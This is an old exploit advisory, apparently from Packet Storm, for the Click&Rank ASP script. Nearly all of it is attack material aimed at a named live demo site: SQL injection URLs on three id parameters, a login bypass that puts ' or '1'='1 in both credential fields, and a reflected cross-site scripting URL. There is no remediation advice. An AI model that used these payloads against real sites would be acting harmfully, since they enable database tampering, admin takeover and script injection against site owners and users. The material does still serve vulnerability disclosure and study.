Click & Rank SQL Injection / XSS

2008-12-16T00:00:00
ID PACKETSTORM:73027
Type packetstorm
Reporter AlpHaNiX
Modified 2008-12-16T00:00:00

Description

                                        
                                            `###########################################################################  
#-------------------------------AlpHaNiX----------------------------------#  
###########################################################################  
  
#Found By : AlpHaNiX  
#website : www.offensivetrack.org  
#contact : AlpHa[AT]HACKER[DOT]BZ  
  
###########################################################################  
  
#script : Click&Rank  
#download : null  
#Demo : http://www.icash.ch/index.html?ClickAndRank/default.asp  
  
###########################################################################  
  
#Exploits :  
  
--=[SQL INJECTION]=--  
http://www.icash.ch/index.html?ClickAndRank/hitcounter.asp?id=(SQL)  
http://www.icash.ch/index.html?ClickAndRank/user_delete.asp?id=(SQL)  
http://www.icash.ch/index.html?ClickAndRank/user_update.asp?id=(SQL)  
  
##########################################################################  
  
--=[AUTH BYPASS]=--  
  
http://www.icash.ch/index.html?ClickAndRank/admin.asp  
  
USERNAME : ' or '1'='1  
PASSWORD : ' or '1'='1  
  
  
##########################################################################  
  
--=[Cross Site Scripting]=--  
  
http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
  
  
  
#Greetz For My Best Friend ZIGMA  
  
###########################################################################  
  
`